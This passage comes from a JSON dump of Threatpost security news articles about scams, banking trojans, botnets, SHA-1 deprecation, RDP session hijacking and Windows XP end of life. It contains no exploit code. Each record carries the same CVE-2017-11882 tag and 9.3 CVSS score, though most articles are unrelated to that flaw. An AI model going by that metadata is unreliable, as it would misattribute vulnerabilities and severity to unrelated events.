suckers and the non-suckers.\n\nAnd that\u2019s where \u201cNigeria\u201d comes in. Basing the attack on an absolutely absurd and unbelievable premise (i.e. far-fetched stories of West African riches) is, according to Herley, an advantage to the attacker.\n\n\n\n\u201cBy sending an email that repels all but the most gullible the scammer gets the most promising marks to self-select, and tilts the true to false positive ratio in his favor.\u201d\n\nHerley is the principle researcher at Microsoft\u2019s machine learning department. The work on Nigerian scams isn\u2019t his first try at parsing the economics of fraud. His past research has debunked industry claims about [the size of the underground economy](<https://threatpost.com/cormac-herley-underground-economy-irc-economics-and-externalities-cybercrime-061209/>) and the [utility of cybercrime surveys](<https://threatpost.com/microsoft-research-cybercrime-surveys-are-useless-062111/>), among other topics. You can read more on the WEIS 2012 conference Web site [here](<http://weis2012.econinfosec.org/program.html>). \n", "cvss3": {}, "published": "2012-06-21T12:40:09", "type": "threatpost", "title": "It's The Stupidity, Stupid: How Absurd Pitches Help Online Scammers Find Their Marks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T20:03:29", "id": "THREATPOST:C5D967CF7CFD8422FD9ACFC1CF7277A6", "href": "https://threatpost.com/its-stupidity-stupid-microsoft-says-absurd-pitches-help-online-scammers-find-their-marks-06211/76718/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:15", "description": "Not long ago, criminals pushing the Dridex banking Trojan were using [Microsoft Excel documents spiked with a malicious macro](<http://threatpost.com/dridex-banking-trojan-spreading-via-office-macros/110255>) as a phishing lure to entice victims to load the malware onto their machines.\n\nEven though macros are disabled by default inside most organizations, the persistent hackers are still at it, this time using XML files as a lure.\n\nResearchers at Trustwave today said that over the past few days, several hundred messages have been corralled that are trying to exploit users\u2019 trust in Office documents with some clever social engineering thrown into the mix in an attempt to convince users to enable macros and thus download the banking malware onto their machines.\n\nThe XML files are passed off as \u201cremittance advice,\u201d or payment notifications, with the hopes that some users will believe it\u2019s an innocent text file and execute the malicious code.\n\n\u201cXML files are the old binary format for Office docs and once you double click them to open, the file associated with Microsoft Word and opens,\u201d said Karl Sigler, Trustwave threat intelligence manager. The malicious macro is compressed and Base64 encoded in order to slide through detection technology, Sigler said, adding that the attackers have also included a pop-up with instructions for the user on how to enable macros with language that stresses macros must be enabled for the invoice to viewed properly or to ensure proper security. \u201cWhich is the exact opposite of what this does,\u201d Sigler said. \u201cIt doesn\u2019t seem to be all that sophisticated. They\u2019re either trying to capitalize on a user\u2019s trust in XML files, or the fact that a user may not be that familiar with what that extension is.\u201d\n\nIf the user does follow through and execute the malware, Dridex behaves like most banking Trojans. It sits waiting for a user to visiting an online banking site and then injects code onto the bank site in order to capture the user\u2019s credentials for their online account.\n\nSigler said this is the first time they\u2019ve spotted XML docs used as a lure. As for macros, they\u2019ve been disabled by default since Office 2007 was released.\n\n\u201cSometimes in large organizations, local administrators have the ability to enable macros,\u201d Sigler said. \u201cSome organizations use them quite a bit, but it\u2019s not common. Most people leave the default settings. It\u2019s hard to say why these guys moved to XML. It could be that they\u2019re looking for a new attack vector and they weren\u2019t getting good click-through rates with the Excel documents. Maybe they were not getting people to enable macros the way they hoped and they\u2019re looking for a way to better their success rate.\u201d\n\nDridex is a descendent of Cridex and is in the GameOver Zeus family. GameOver Zeus has been used for years to great profit, particularly through wire fraud. It used a peer-to-peer architecture to spread and send stolen goods, opting to forgo a centralized command-and-control. P2P and domain generation algorithm techniques make botnet takedowns difficult and extend the lifespan of such malware schemes. The previous Dridex campaign targeted U.K. banking customers with spam messages spoofing popular companies either based or active in the U.K. Separate spam spikes using macros started in October and continued right through mid-December; messages contained malicious attachments claiming to be invoices from a number of sources, including shipping companies, retailers, software companies, financial institutions and others.\n", "cvss3": {}, "published": "2015-03-06T13:38:40", "type": "threatpost", "title": "Dridex Banking Trojan Spreading Via Macros in XML Files", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-03-10T11:23:01", "id": "THREATPOST:DD7A2F272ACFDE71B0A0CEC234C35876", "href": "https://threatpost.com/dridex-banking-trojan-spreading-via-macros-in-xml-files/111503/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:00", "description": "One by one, tech companies have [been tossing aside the SHA-1 cryptographic algorithm](<http://threatpost.com/microsoft-warns-customers-away-from-sha-1-and-rc4/102902>) like the unreliable collision-prone mess that it is.\n\nMicrosoft was among the first to steer its customers away from SHA-1 and established an internal edict that its developers would no longer use it for code-signing or its certificates after January 2016.\n\nYesterday among the flurry of its [Patch Tuesday security bulletins](<http://threatpost.com/fixes-for-ie-flash-player-in-october-patch-tuesday-release/108838>), Microsoft took another important step when it issued a pair of security advisories, one notifying users that it had made the [SHA-2 algorithm available for Windows 7 and Windows Server 2008 R2](<https://technet.microsoft.com/en-us/library/security/2949927>). The other was an update for Microsoft EAP implementations that [enables the use of Transport Layer Security (TLS) 1.1 or 1.2](<https://technet.microsoft.com/en-us/library/security/2977292>).\n\nSHA-1 collisions have been theoretically possible for years; collisions occur when an attacker is able to generate a certificate with the same signature as the original cert. Though mathematically possible, a collision attack, even against a weakened SHA-1, would take significant hardware resources in order to execute.\n\nThat gap, however, is narrowing. In 2012, Bruce Schneier published research in which he concluded that [collisions would be within reach of most hackers by 2018](<http://threatpost.com/sha-1-hash-collision-could-be-within-reach-attackers-2018-100512/77088>). Citing calculations done by Jesse Walker based on the cost of commodity microprocessors and evidence that Moore\u2019s law will extend another decade, server-cycle costs would be around $173,000 on Amazon, well within reach of a funded attacker such as an organized crime group or nation state.\n\nThe use of fraudulent certificates would allow an advanced attacker such as a nation state to pose as Microsoft, Google or any site of their choosing.\n\nThe use of fraudulent certificates would allow an advanced attacker such as a nation state to pose as Microsoft, Google or any site of their choosing, putting web traffic and personal communication at risk. Google, and most recently Mozilla, have announced their road maps for SHA-1 deprecation. Beginning with an upcoming Chrome release in November, [Google\u2019s browser will no longer trust websites whose certificate chains trust SHA-1](<http://threatpost.com/google-sunsetting-weak-sha-1-crypto-algorithm/108145>). Mozilla, meanwhile, asked Certificate Authorities and websites to [upgrade to cryptographically stronger versions of the algorithm](<http://threatpost.com/mozilla-latest-to-part-ways-with-sha-1/108495>) and said it would no longer trust SHA-1 certs after Jan. 1, 2017.\n\nMicrosoft\u2019s decision to make SHA-2 available for Windows 7 means that it joins Windows 8, 8.1 and Windows Server 2012, 2012 R2 and Windows RT and RT 8.1, as Windows versions that already support SHA-2. Windows 8 and higher support it by default and do not require an update, Microsoft said, adding that the update is not available for Windows Server 2003, Windows Vista, or Windows Server 2008.\n\nMicrosoft\u2019s decision to enable TLS for EAP implementations continues its push to encrypt its web-based services. In July, Microsoft announced that its webmail service [Outlook.com supports TLS encryption](<http://threatpost.com/microsoft-expands-tls-forward-secrecy-support/106965>) inbound and outbound, in addition to Perfect Forward Secrecy. OneDrive cloud storage also enabled Perfect Forward Secrecy in July, Microsoft said. PFS randomizes private encryption keys, meaning that if a key is someday compromised, it cannot be used to decrypt old messages.\n\nEAP, or Extensible Authentication Protocol, is the authentication framework used in Windows client and server rollouts. Windows 7, Windows Server 2008 R2, Windows 8, Windows 8.1, Windows Server 2012, and Windows RT are enabled through the update to support TLS via a simple registry modification, Microsoft said. A hacker who is able to exploit an older version of TLS could carry out a man-in-the-middle attack, hijack traffic and steal information in plaintext from sessions thought to be encrypted.\n\n_This article was updated Oct. 16 clarifying that SHA-2 is available only for Windows 7 and up, and earlier supported versions of Windows will not support SHA-2._\n", "cvss3": {}, "published": "2014-10-15T11:40:36", "type": "threatpost", "title": "Microsoft Extends SHA-2, TLS Support for Windows", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-10-21T15:09:13", "id": "THREATPOST:AE4AEC18802953FE366542717C056064", "href": "https://threatpost.com/microsoft-extends-sha-2-tls-support-for-windows/108855/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:04", "description": "Windows XP security support ends Tuesday and until now, most of the public hand-wringing over XP\u2019s end-of-life has been about the potential for malware outbreaks against unpatched vulnerabilities that have been [stockpiled by hackers](<http://threatpost.com/windows-xp-end-of-life-breeding-equal-parts-fud-legit-concerns/105252>) anxiously awaiting April 8, 2014.\n\nBut what about vulnerabilities in XP that have been responsibly shared with Microsoft and won\u2019t be fixed? Those too are perpetual zero-days after Tuesday.\n\nMicrosoft has made huge strides in developing trusted relationships with security researchers who are actively submitting bugs to Microsoft across its product lines. For Microsoft\u2019s part, it has done outreach to researchers, clarified disclosure policies and processes and established [bounty programs for bypasses of innate Windows mitigations](<http://threatpost.com/microsofts-bug-bounty-program-and-the-law-of-unintended-consequences/101038>).\n\nAnd Microsoft isn\u2019t to be faulted for its business decision made long ago to end extended support for XP that includes security patches. Yet the fact remains whatever XP systems remain in circulation after tomorrow will be exposed and that brings up questions, such as: How will white or gray hats respond? For example, will there be a firestorm of public disclosures in the coming weeks?\n\n\u201cI know a subset of people who have disclosed stuff [in XP] to Microsoft that has not been patched, and that\u2019s given what I know. I\u2019m sure there\u2019s more I don\u2019t know of,\u201d said Ross Barrett, senior manager of security engineering at Rapid7. \u201cI wouldn\u2019t encourage researchers to publically disclose their researche because they think that might make Microsoft issue a patch, because that\u2019s not going to happen. The only result is that it would increase the exposure for people at large.\n\n\u201cIt\u2019s a muddy bit of water,\u201d Barrett said. \u201cMicrosoft has been good about dealing with researchers who have been doing the right thing by following responsible disclosure procedures, but now they\u2019re not seeing action.\u201d\n\nMicrosoft did not respond to a request for comment in time for publication.\n\nHP\u2019s Zero Day Initiative, which buys vulnerabilities and exploits from researchers and shares them first with customers and then the affected vendor, has [203 advisories pending public disclosure](<http://www.zerodayinitiative.com/advisories/upcoming/>) listed on its website, 54 of which are Microsoft vulnerabilities going back a year. The website doesn\u2019t list the specific Microsoft product affected, but Microsoft has more than any other major vendor on the list.\n\n\u201cI\u2019m sure there\u2019s tons of stuff still out there; some of it is design flaw stuff that Microsoft can\u2019t fix or never got around to it,\u201d Barrett said. \u201cI\u2019m sure there\u2019s a backlog of stuff, but the clock has run out on XP.\u201d\n\nMicrosoft has already announced its final XP patch, a fix for a zero-day in Word that will be available Tuesday (Office 2003 support also ends Tuesday). The fear among some experts is that hackers will look at Microsoft security bulletins for vulnerabilities in supported products and trace those back to their potential exploitability in XP.\n\n\u201cAbsolutely hackers do that,\u201d Barrett said. \u201cIf you\u2019ve got a vulnerability in this file, they\u2019ll track it back to a particular DLL and see that it\u2019s been part of the OS since 2002 and not updated since 2004, they\u2019ll know it\u2019s vulnerable.\n\n\u201cYou might see a golden age of XP vulnerabilities for the next four to six months when adoption of XP is still relatively high and countermeasures are no longer in place. Then you\u2019ll start to see it fade as it\u2019s less used.\u201d\n\nQualys CTO Wolfgang Kandek has been tracking XP use in certain industries through the company\u2019s vulnerability scanner. Financial institutions still have the highest use of XP at 21 percent, followed by transportation at 14 percent (though this has dropped from 55 percent 12 months ago). Retail, another industry run ragged by hackers, is also at 14 percent. Support for Windows XP Embedded, which runs inside a number of consumer and commercial devices in these industries, does not run out until Jan. 12, 2016.\n\n\u201cThis is an additional weakness for these (retail) systems,\u201d Kandek said. \u201cThere are already problems with remote management, default passwords that work everywhere, a bunch of things that were done to make management easier that were not configured well. This just adds to it.\u201d\n\nKandek said that roughly 70 percent of vulnerabilities that were patched in 2013 were found in Windows 8 through XP.\n\n\u201cI don\u2019t see why that would stop in May, June or July. Attackers can use that knowledge as pointer into XP to find if a vulnerability exists. It\u2019s an accelerator for them. My feeling is that after two or three months, there will be tools in public that reliably exploit XP. I can definitely see how that would make an attacker\u2019s work much easier.\u201d\n", "cvss3": {}, "published": "2014-04-08T06:03:54", "type": "threatpost", "title": "Unpatched Bugs, Windows XP End of Life and Public Disclosure", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-04-08T00:08:09", "id": "THREATPOST:B051AFA0F0705404F1CD22704980AE7F", "href": "https://threatpost.com/the-muddy-waters-of-xp-end-of-life-and-public-disclosures/105295/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:56", "description": "A researcher has exposed how attackers with local admin privileges could use native command-line Windows tools to hijack other users\u2019 sessions without credentials.\n\nResearcher Alexander Korznikov on Friday published a [report](<http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html>) in which he describes how he could, locally and remotely via Remote Desktop Protocol (RDP), access other users\u2019 sessions\u2014even sessions that have been disconnected for some time\u2014with one command.\n\nKorznikov said an attacker could access domain admin sessions, read documents, and access systems, cloud domains or applications (email, Notepad, others) that the user has previously logged in to. He said he tested his attack on Windows 2012 and Windows 2008 servers, as well as Windows 10 and Windows 7 and all that is required is the NT AUTHORITY/SYSTEM command line, or to create a service that will connect a session back to the attacker\u2019s.\n\n\u201cSomeone can say, \u2018If you are admin, you can dump a server\u2019s memory and parse it.\u2019 That\u2019s correct, but you don\u2019t need it any more,\u201d Korznikov told Threatpost. \u201cJust two simple commands and you are in. The most incredible thing is that I don\u2019t need to know the credentials of the hijacked user. It is pure password-less hijacking.\u201d\n\nhttps://www.youtube.com/watch?v=oPk5off3yUg\n\nhttps://www.youtube.com/watch?v=VytjV2kPwSg\n\nResearcher Kevin Beaumont, meanwhile, published a [separate report](<https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6#.tlqebcmqe>) essentially confirming Korznikov\u2019s work adding that by running the tscon.exe command as the SYSTEM user, an attacker could also connect to any session without a password.\n\n\u201cIt doesn\u2019t prompt, it just connects you to the user\u2019s desktop. I believe this is due to the way session shadowing was implemented in Microsoft Windows, and it runs throughout the years like this,\u201d Beaumont wrote.\n\nBeaumont said that his and Korznikov\u2019s research could bypass the work required to dump server memory and parse for passwords; this provides instant access to the target\u2019s desktop without leaving artifacts in a log or needing to use external tools such as Metaspoit.\n\n\u201cThis isn\u2019t about SYSTEM \u2014 this is about what you can do with it very quickly, and quietly. Attackers aren\u2019t interested in playing, they\u2019re interested in what they can do with techniques. This is a very valid technique,\u201d Beaumont wrote. \u201cSo, you have full blown RDP session hijacking, with a single command.\u201d\n\nKorznikov said he confirmed with Benjamin Delpy, who six years ago disclosed [similar findings](<http://blog.gentilkiwi.com/securite/vol-de-session-rdp>), that this was a Windows feature and not a vulnerability, but that does not discount the attack value of the situation, he said. Microsoft, for its part, is unlikely to patch this.\n\n\u201cThe issue described in the report is not a security vulnerability as it requires local administrator rights on the machine,\u201d a Microsoft spokesperson told Threatpost.\n\nKorznikov said he did not disclose his findings to Microsoft prior to publication of his report last week because it was a design flow issue, out of scope for its bug bounties, and that he did not want to wait \u201csix months until resolution for a CVE.\u201d\n\n\u201cIf you are admin, you can do everything. But here is the point: why and how you become admin? If some unprivileged user becomes admin using some kind of local privilege escalation, that\u2019s the problem\u2014and not the design flow\u2014we are talking about,\u201d Korznikov said. \u201cYou can do everything, even patch terminal services in a way that it will accept your token and allow shadowing mode, without a user\u2019s knowledge.\u201d\n", "cvss3": {}, "published": "2017-03-20T14:50:07", "type": "threatpost", "title": "Local Windows Admins Can Hijack Sessions Without Credentials", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2017-03-22T21:45:56", "id": "THREATPOST:1C5C89106D8897D6CDDFF572948A779A", "href": "https://threatpost.com/local-windows-admins-can-hijack-sessions-without-credentials/124427/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:02", "description": "[](<https://threatpost.com/microsoft-settles-kelihos-botnet-defendant-says-he-didnt-run-network-101912/>)Microsoft on Friday said it has reached a settlement with a Russian programmer it named as a defendant in a lawsuit related to the operation of the notorious [Kelihos botnet](<https://threatpost.com/botnet-shutdown-success-story-how-kaspersky-lab-disabled-hluxkelihos-botnet-092911/>). The company said that it no longer believes Andrey N. Sabelnikov was the operator of the botnet, but was instead responsible for writing some code that was later used by the botnet.\n\nThis is a departure from the company\u2019s earlier statements, which painted Sabelnikov as someone \u201cresponsible for the operations of the Kelihos botnet.\u201d After working with researchers at Kaspersky Lab and other organizations to take down the Kelihos bothet in the autumn of 2011, Microsoft amended its original complaint to include Sabelnikov as a defendant. The company alleged in a complaint filed in U.S. District Court in January that not only did Sabelnikov [write some of the Kelihos code](<https://threatpost.com/microsoft-adds-kelihos-botnet-operator-civil-complaint-012412/>), but he helped run the botnet.\n\n\u201cIn today\u2019s complaint, Microsoft presented evidence to the court that Mr. Sabelnikov wrote the code for and either created, or participated in creating, the Kelihos malware. Further, the complaint alleges that he used the malware to control, operate, maintain and grow the Kelihos botnet. These allegations are based on evidence Microsoft investigators uncovered while analyzing the Kelihos malware. Microsoft also alleges that Mr. Sabelnikov registered more than 3,700 \u2018cz.cc\u2019 subdomains from Mr. Piatti and dotFREE Group SRO, and misused those subdomains to operate and control the Kelihos botnet,\u201d Richard Boscovich, a senior staff attorney in the Microsoft Digital Crimes Unit, wrote in a [blog post at the time](<https://blogs.technet.com/b/microsoft_blog/archive/2012/01/23/microsoft-names-new-defendant-in-kelihos-case.aspx?Redirected=true>). \n\nNow, Microsoft is taking a somewhat different tack. Rather than accusing Sabelnikov of running the Kelihos botnet, the company [released a statement](<https://blogs.technet.com/b/microsoft_blog/archive/2012/10/19/microsoft-reaches-settlement-with-second-kelihos-defendant.aspx?Redirected=true>) saying that he merely wrote some of the malware\u2019s code. As a result, the company and the programmer reached an undisclosed out-of-court settlement.\n\n\u201cMicrosoft and St. Petersburg software programmer Andrey Sabelnikov have entered into a Settlement Agreement in the matter of Microsoft v. Sabelnikov. During the negotiations, after reviewing the evidence provided by Microsoft and engaging in discussions, the parties have come to an understanding that Mr. Sabelnikov wrote code that was used in the Kelihos botnet code, but the programmer is not the operator of the botnet or involved in its activities. After a review and understanding of all of the details of the case, the parties were able to enter into a confidential settlement agreement in this matter, which resolves the dispute between the parties,\u201d Boscovich wrote on Friday.\n\nMicrosoft has been quite aggressive in its efforts to disrupt and take down botnets in the last couple of years, using both technical and legal tactics to knock the networks offline. The company has gone after several different botnets, with varying degrees of fervor and success, but the Kelihos operation was the first time that Microsoft had named any individuals as defendants in its legal complaints. Until then it had focused on hosting providers or other corporate entities allegedly involved in botnet operations.\n", "cvss3": {}, "published": "2012-10-19T19:01:33", "type": "threatpost", "title": "Microsoft Settles With Kelihos Botnet Defendant, Says He Didn't Run the Network", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:31:21", "id": "THREATPOST:DCEC8DA2CC98CD3F9DF8B10773BD6F01", "href": "https://threatpost.com/microsoft-settles-kelihos-botnet-defendant-says-he-didnt-run-network-101912/77135/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:14", "description": "[](<https://threatpost.com/research-reveals-huge-cache-ftp-email-credentials-stolen-waledac-020211/>)Researchers have discovered that the gang behind the once-and-future botnet Waledac has gathered nearly 500,000 stolen passwords for email accounts, along with close to 125,000 sets of pilfered credentials for FTP accounts.\n\nThe discovery isn\u2019t so surprising in its details, but rather in its scope. There are a slew of Trojans and info-stealing pieces of malware around these days that are designed specifically to seek out and steal this kind of data. Email passwords, which often are simple and reused on other accounts by victims, can give attackers access to far more than just a victim\u2019s mundane message exchanges with friends. Email accounts can lead to online banking credentials, credit card accounts and other high-value data.\n\nResearchers at The Last Line of Defense, a security firm comprising professors and grad students from universities around the world, [analyzed the data that the Waledac crew had gathered](<http://blog.tllod.com/2011/02/01/calm-before-the-storm/>) and found that the email credentials were being used in spam campaigns designed to evade real-time blacklists and other filters.\n\n\u201cWe also discovered 489,528 credentials for POP3 email accounts. These credentials are known to be used for \u201c[high-quality\u201d spam campaigns](<http://www.usenix.org/event/leet10/tech/full_papers/Nunnery.pdf>). \nThe technique abuses legitimate mail servers by authenticating as the \nvictim through the SMTP-AUTH protocol to send spam messages. This method \nmakes IP-based blacklist filtering considerably more difficult,\u201d the analysis said.\n\nWaledac is one of the more intriguing botnets in recent years, not because of its methods or targets, but because of its resilience. Microsoft and some other groups [took action against the Waledac botnet](<https://threatpost.com/waledac-botnet-now-completely-crippled-experts-say-031610/>) in February 2010, in large part to stem the tide of spam messages that were flooding email servers at Hotmail and other consumer email services. Within a month of the action, which involved taking down hundreds of domains Waledac was using for command and control, the botnet was essentially dead in the water.\n\nHowever, late last year Waledac appeared to spring back to life, beginning a major spam campaign right around the end of December and beginning of January, sending out the always-popular holiday e-cards. And spam levels in general began to spike in late January. But, the TLLOD researchers said that the renewed spam activity from Waledac came well after the botnet\u2019s creators began offering a new service for getting C&amp;C servers up and running.\n\n\u201cIn addition to the compromised credentials, we also had visibility of \nnewly infected nodes connecting to a bootstrap Command-and-Control \nserver. The bootstrap server speaks a proprietary protocol known as \nANMP, and disseminates a list of router nodes (other compromised hosts) \nto infected machines. Note that every node generates a random 16 byte \nID, that is reported back to Waledac\u2019s C&amp;Cs. Our analysis indicates \nthat the bootstrap service first appeared online on December 3, 2010 \nwell before the New Year\u2019s spam campaign. In total, there were 12,249 \nunique node IDs that connected to the bootstrap C&amp;C, and 13,070 \nrouter IDs,\u201d Brett Stone-Gross said in his analysis of the Waledac resurgence.\n", "cvss3": {}, "published": "2011-02-02T14:52:18", "type": "threatpost", "title": "Research Reveals Huge Cache of FTP, Email Credentials Stolen by Waledac", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:35:15", "id": "THREATPOST:D8172FCB461F5843B3391B2336A4D02F", "href": "https://threatpost.com/research-reveals-huge-cache-ftp-email-credentials-stolen-waledac-020211/74900/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:08:39", "description": "[](<https://threatpost.com/microsoft-tries-boost-sdl-adoption-020210/>)Microsoft is trying to boost adoption of the software security practices in its Security Development Lifecycle by releasing a revised set of instructions to make implementation of the process easier and faster. \n\nAt the Black Hat DC conference on Tuesday, the company announced the release of its [\u201cSimplified Implementation of the Microsoft SDL\u201d](<http://www.microsoft.com/downloads/details.aspx?FamilyID=0baff8e8-ab17-4e82-a1ff-7bf8d709d9fb&displaylang=en>) paper, as well as a template designed to help developers integrate Microsoft\u2019s SDL, along with the Agile Software Development process, into Visual Studio. That template will enable developers to automatically check all of their code developed in Visual Studio against the SDL framework. \n\nMicrosoft has been pushing the need for more secure software development practices for several years, but some organizations have said that the company\u2019s SDL model is too difficult and expensive to implement, and doesn\u2019t fit into their organization\u2019s development structure. So the company is releasing the simplified description of the SDL implementation process in an effort to get more developers on board.\n\n\u201cThe process outlined in this paper sets a minimum threshold for SDL compliance. That said, organizations aren\u2019t uniform \u2013 development teams should apply the SDL in a way that is suitable to the human talent and resources available, but doesn\u2019t compromise organizational security goals,\u201d the company said in the SDL paper.\n\nThe paper defines various roles for people involved in the SDL process, and lays out required and optional SDL activities, as well as a five-phase process from requirements through release.\n", "cvss3": {}, "published": "2010-02-02T15:39:41", "type": "threatpost", "title": "Microsoft Tries to Boost SDL Adoption", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T13:34:21", "id": "THREATPOST:7E30033E60118E5B4B8C14689A890155", "href": "https://threatpost.com/microsoft-tries-boost-sdl-adoption-020210/73469/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-04-10T12:12:46", "description": "The well-known LokiBot malware has popped up in several malicious spam campaigns [over the past year](<https://threatpost.com/threatlist-ransomware-eks-and-trojans-lead-the-way-in-q3-malware-trends/138433/>), covertly siphoning information from victims\u2019 compromised endpoints. Researchers this week are warning of the most recent sighting of the malware, which was recently spotted in spam messages targeting a large U.S. manufacturing company.\n\nResearchers first discovered the campaign on Aug. 21 after an unnamed U.S. semiconductor distributor received a spam email sent to the sales department from a potentially compromised \u201ctrusted\u201d sender. The email, purporting to be distributing an attached request for quotation, was actually harboring prolific trojan LokiBot. \n[](<https://threatpost.com/newsletter-sign/>)\u201cThe attack is pretty straightforward,\u201d said Fortinet researchers in a [Tuesday analysis of the attack](<https://www.fortinet.com/blog/threat-research/new-infostealer-attack-uses-lokibot.html>). \u201cThe LokiBot sample has a file size of 286 KB and was recently compiled on Aug 21, which is coincidentally the same date as when the malicious spam was sent\u2026. The spam email then encourages the user to open the attachment as the senders\u2019 colleague is currently out of office, and at the same time offers the potential victim some assurance that he/she can provide further clarification of the contents within the document if needed.\u201d\n\n## Red Flags\n\nDespite the spam email (titled \u201cUrgent Request for Quotation #RFQE67Y54\u201d) coming from a trusted sender, there were several tell-tale signs that might give away the email as malicious.\n\nWhile the email is \u201csimple in appearance,\u201d it contained language that appears to be written by a non-native English speaker and contained spelling errors. For instance, the email states, \u201cPlease see \u2018attache'\u201d, when referring to an \u201cRFQ\u201d (or a \u201crequest for quotation\u201d).\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/09/10083714/lokibot-malspam.png>)\n\nAnother giveaway is that a closer look at the attached file\u2019s information shows it to be curiously named \u201cDora Explorer Games,\u201d which is in reference to the children\u2019s\u2019 TV heroine from the show \u201cDora The Explorer\u201d \u2013 a strange name for a file that purports to be related to manufacturing.\n\n\u201cWe don\u2019t know if this file info was put in there as a distraction or for reasons unknown to us, as it doesn\u2019t make sense to have such a file name targeting a military and government-based contractor,\u201d researchers said.\n\nOnce opened, the file actually harbors LokiBot malware, which is known for stealing a variety of credentials, including FTP credentials, stored email passwords, passwords stored in the browser, as well as a whole host of other credentials.\n\n## LokiBot Malware\n\nThe malware is known for being simple and effective and for its adoption of diverse attachment types. The malware is a commodity in underground markets, with versions selling for as little as $300.\n\n\u201cLokiBot is distributed in various forms, and has been seen in the past being distributed in zipped files along with malicious macros in Microsoft Word and Excel, or leveraging the exploit CVE-2017-11882 (Office Equation Editor) via malicious RTF files,\u201d said researchers.\n\nLokiBot is also known to be distributed in sneaky ways, including steganography. Several recent attacks in fact showed the malware [disguised as a .zipx attachment](<https://threatpost.com/lokibot-trojan-spotted-hitching-a-ride-inside-png-files/143491/>) hidden inside a .PNG file that can slip past some email security gateways, or hidden as an [ISO disk image file attachment](<https://threatpost.com/malspam-emails-blanket-lokibot-nanocore-malware-with-iso-files/145991/>).\n\nHowever, in the most recent campaign \u201cthis particular sample did not use any steganography as past variants were seen doing,\u201d researchers said.\n\n## Connected Spam Campaign\n\nUpon closer investigation, researchers were able to draw loose links between the campaign and a previous spam attack through the IP address.\n\nThe IP address of this attack is registered to a webhosting provider in Phoenix, Ariz. (called LeaseWeb USA), which was previously used twice before in malicious spam attacks that occurred in June.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/09/10094115/image_753132854.img_.png>)\n\nRelated June malspam campaign\n\nThese earlier attacks targeted a large German Bakery in a malicious spam attack trying to lure a victim into downloading an electronic invoice. However, there were key differences between the two spam emails, including language (the previous email was in Chinese).\n\n\u201cBecause of the low volume identified, it appears that this IP address may be under the control of one group, and possibly only being used for very targeted attacks,\u201d researchers said. \u201cHowever, we can only assume this \u2013 time will provide a better historical snapshot of campaigns using this IP address.\u201d\n\nTo protect against similar future campaigns, researchers urged organizations to both adopt mail solutions as well as train their employees to look out for spearphishing attempts.\n\n\u201cSince it has been reported that this threat has been delivered via social engineering distribution mechanisms, it is crucial that end users within an organization are made aware of various types of attacks delivered via social engineering,\u201d researchers said. \u201cThis can be accomplished through regularly-occurring training sessions and impromptu tests using predetermined templates by internal security departments within an organization.\u201d\n", "cvss3": {}, "published": "2019-09-10T14:07:03", "type": "threatpost", "title": "U.S. Manufacturer Most Recent Target of LokiBot Malspam Campaign", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2019-09-10T14:07:03", "id": "THREATPOST:0234DE925A24BDFF85D569B0592C4E40", "href": "https://threatpost.com/u-s-manufacturer-most-recent-target-of-lokibot-malspam-campaign/148153/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T22:58:07", "description": "In a move that has surprised many in the security community, Microsoft has disbanded its Trustworthy Computing unit, the group that was responsible for the pioneering work that helped reverse the company\u2019s security reputation and make Windows a much more secure and reliable computing platform.\n\nThe end of the TwC group comes as Microsoft is in the middle of a major shift. The company on Thursday announced it was laying off 2,100 employees and also that it was closing its research facility in Silicon Valley. Under the changes in the security group at Microsoft, some of the TwC employees will be reassigned to the Cloud and Enterprise division and others will wind up in the legal group. The move presumably is an effort to integrate the security and privacy expertise in the TwC group into the rest of the company.\n\nThe break-up of the TwC group marks the end of an era at Microsoft, an era that began with the [memo that Bill Gates sent](<https://threatpost.com/ten-years-after-gatess-memo-effects-still-being-felt-011212/76089>) to company employees in January 2002. Microsoft had been under fire from some of its larger customers\u2013government agencies, financial companies and others\u2013about the security problems in Windows, issues that were being brought front and center by a series of self-replicating worms and embarrassing attacks. Gates realized that the company was in danger of losing a 